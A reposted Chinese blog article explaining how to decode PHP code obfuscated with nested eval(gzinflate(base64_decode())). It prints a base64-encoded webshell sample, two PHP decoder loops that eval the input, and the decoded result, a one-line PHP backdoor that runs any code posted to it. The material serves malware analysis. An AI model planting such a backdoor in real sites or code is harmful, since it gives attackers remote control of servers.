eval(gzinflate(base64_decode解密方法
来源:互联网 发布:淘宝管控记录怎么销 编辑:程序博客网 时间:2024/05/17 01:59
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。
PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码和解码代码方法,就是通常我们在程序中见的eval(gzinflate(base64_decode(‘加密代码’))); 形式的加密方法。
首先,针对一层加密的,我们可以直接把eval改为echo即可解密,这里我就不多解释了,今天要解密的代码如下:
经过加密的代码
<?phpecho(gzinflate(base64_decode('DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw==')));?>
我尝试过把eval改为echo结果发现还是类似的东西,经过查找终于发现了解决办法。
解密方法1
<?php/** * Created BY 独自等待 * Date : 13-6-25 * Time : 下午2:06 * FileName : decode_gzinflate.php * 欢迎访问独自等待博客www.waitalone.cn *///已经加密的文件内容$a = "eval(gzinflate(base64_decode('这里面放BASE64代码')));";function decodephp($a){ $max_level = 300; //最大层数 for ($i = 0; $i < $max_level; $i++) { ob_start(); eval(str_replace('eval', 'echo', $a)); $a = ob_get_clean(); if (strpos($a, 'eval(gzinflate(base64_decode') === false) { return $a; } }}echo decodephp($a);?>
解密方法2
<?php/** * Created BY 独自等待 * Date : 13-6-25 * Time : 下午2:27 * FileName : decode_gzinflate2.php * 欢迎访问独自等待博客www.waitalone.cn */$a = file_get_contents("加密.php"); //含有eval语句的文本文件//将有eval(gzinflate(base64_decode的加密文件只留eval(gzinflate(base64_decode('...');"语句//其他诸如"<?"等信息都去掉并保存文件为"加密.php"while (strstr($a, "eval")) { ob_start(); eval(str_replace("eval", "echo", $a)); $a = ob_get_contents();}echo $a;?>
最终经过密码得到源代码如下:
<?php eval($_POST[coo0l]);?>
不知道是哪位大牛的一句话,经过了这么多层加密,太强大了。
在线解密:
http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php
文章参考:
http://www.marshal.sh.cn/post/430/
http://www.blog.dzssx.net/user1/szyjl/archives/2008/8826.html
本文转载自:https://www.waitalone.cn/eval-gzinflate-base64_decode-decryption.html
阅读全文
0 0
- eval(gzinflate(base64_decode解密方法
- eval(gzinflate(base64_decode无限加密文件的解密代码
- PHP使用eval(gzinflate(str_rot13(base64_decode('BASE64加密后内容'))))核心代码的解密
- PHP base64_decode+gzinflate压缩编码和解码代码
- php base64_decode 解码方法
- 关于js eval 的解密方法
- 关于js eval 的解密方法 二
- php中base64_encode base64_decode加密解密函数
- php解决用base64_decode解密的时候,出现乱码
- base64_decode解密的时候,出现乱码或者是解不出
- php解决用base64_decode解密的时候,出现乱码
- php中base64_decode与base64_encode加密解密函数实例
- PHP解决base64_decode解密出现的乱码问题
- php中 base64_decode与base64_encode加密解密函数
- php中base64_decode与base64_encode加密解密函数实例
- js eval解密
- js(eval)解密工具
- 解密JS eval
- 无人机行业重商不重术,是投资人的错?
- 空中机器人之父韦杰·库玛,要带着他的蜜蜂无人机群来中国“耍杂技”了
- 看谷歌和OpenAI联合发布五条AI定律如何打脸霍金
- 通过loganalyzer展示数据库中的日志
- maven dependencies和dependencyManagement标签的区别
- eval(gzinflate(base64_decode解密方法
- 仿美团下拉刷新控件(二)
- Android 使用Canvas中的drawBitmap方法绘制拉伸的图片
- 金属大屏正面指纹 OPPO A59开启线下预约活动
- 高盛报告:2025年影响汽车的四大因素和七大趋势
- 成绩值得骄傲,但“同志仍需努力”——外国人眼中的世界第一超算“神威太湖之光”
- 编辑距离问题——动态规划
- R9持续热销 助力OPPO引领国产手机市场份额增长
- centos7+apache2.4+python3.6+django1.11